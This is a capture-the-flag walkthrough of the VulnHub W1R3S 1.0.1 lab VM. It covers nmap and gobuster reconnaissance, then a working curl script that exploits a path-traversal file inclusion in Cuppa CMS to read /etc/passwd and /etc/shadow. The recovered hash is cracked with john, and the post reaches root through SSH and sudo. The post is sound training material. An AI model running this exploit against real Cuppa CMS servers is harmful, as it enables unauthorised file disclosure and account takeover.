This post documents the complete walkthrough of W1R3S: 1.0.1, a boot2root VM created by SpecterWires, and hosted at VulnHub. If you are uncomfortable with spoilers, please stop reading now.

Background

Someone hires you to do a penetration test on the W1R3S.inc individual server and report all findings. They ask you to gain root access and find the flag (located in /root directory).

Information Gathering

Let’s kick this off with a nmap scan to establish the services available in the host.

# nmap -n -v -Pn -p- -A --reason -oN nmap.txt 192.168.100.130
...
PORT     STATE SERVICE REASON         VERSION
21/tcp   open  ftp     syn-ack ttl 64 vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxr-xr-x    2 ftp      ftp          4096 Jan 23 11:21 content
| drwxr-xr-x    2 ftp      ftp          4096 Jan 23 11:25 docs
|_drwxr-xr-x    2 ftp      ftp          4096 Jan 28 16:53 new-employees
22/tcp   open  ssh     syn-ack ttl 64 OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 07:e3:5a:5c:c8:18:65:b0:5f:6e:f7:75:c7:7e:11:e0 (RSA)
|_  256 03:ab:9a:ed:0c:9b:32:26:44:13:ad:b0:b0:96:c3:1e (ECDSA)
80/tcp   open  http    syn-ack ttl 64 Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
3306/tcp open  mysql   syn-ack ttl 64 MySQL (unauthorized)

As usual, let’s go with directory/file enumeration on the web service and see what we get.

Directory/File Enumeration

I like to use gobuster with one of the big directory wordlists.

Gobuster v1.1                OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://192.168.100.130/
[+] Threads      : 10
[+] Wordlist     : /usr/share/dirb/wordlists/big.txt
[+] Status codes : 200,204,301,302,307
[+] Expanded     : true
=====================================================
http://192.168.100.130/administrator (Status: 301)
http://192.168.100.130/javascript (Status: 301)
http://192.168.100.130/wordpress (Status: 301)
=====================================================

OK. We find two interesting directories: administrator and wordpress.

Cuppa CMS

The administrator directory turns out to be the installation setup for Cuppa CMS. This is how it looks like when I point the browser to /administrator.

screenshot-1

According to the official documentation, in order for the installation to complete, it will have to create the database first.

Remember, the database should be created before to install Cuppa CMS.

The Cuppa CMS installation was never completed in the first place or I’ll not be seeing the setup page. I downloaded a copy of the Cuppa CMS code to see if I can discover any vulnerabilities.

I’m not sure if this is a new vulnerability but it’s a pleasant surprise to find an LFI vulnerability in alertConfigField.php at line 77.

screenshot-2

To test it, I wrote cat.sh, a simple script that will display any file as long as there’s permission to do so.

cat.sh
#!/bin/bash

_HOST=192.168.100.130
_PATH=administrator/alerts/alertConfigField.php
_PARM=urlConfig
_TRAV=../../../../../../../..

curl -s --data-urlencode "${_PARM}=${_TRAV}$1" $_HOST/$_PATH \
| sed -r 's/^ {8}//' \
| sed '71,$!d' \
| sed '$d' \
| sed '$d'

Let’s give it a shot and see what we get.

# ./cat.sh /etc/passwd
...
w1r3s:x:1000:1000:w1r3s,,,:/home/w1r3s:/bin/bash
sshd:x:121:65534::/var/run/sshd:/usr/sbin/nologin
ftp:x:122:129:ftp daemon,,,:/srv/ftp:/bin/false
mysql:x:123:130:MySQL Server,,,:/nonexistent:/bin/false

Imagine my surprise when I request for /etc/shadow and it shows up in the output.

# ./cat.sh /etc/shadow
...
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::
sshd:*:17554:0:99999:7:::
ftp:*:17554:0:99999:7:::
mysql:!:17554:0:99999:7:::

I’m not sure if /etc/shadow is intentionally made world-readable; it should not be the case.

John the Ripper

With both passwd and shadow available, I can unshadow them, and send them to john for offline cracking with a wordlist like “rockyou”.

The cracking completes in seconds.

# john --format=crypt --show hashes.txt
w1r3s:computer:1000:1000:w1r3s,,,:/home/w1r3s:/bin/bash

I can now log in to the box via SSH with the cracked password.

screenshot-3

Privilege Escalation

It isn’t long before I see that w1r3s is on the sudoers list.

screenshot-4

Becoming root is another command away.

screenshot-5

:dancer:

Afterthought

To be honest, I didn’t even bother with WordPress. :stuck_out_tongue_winking_eye: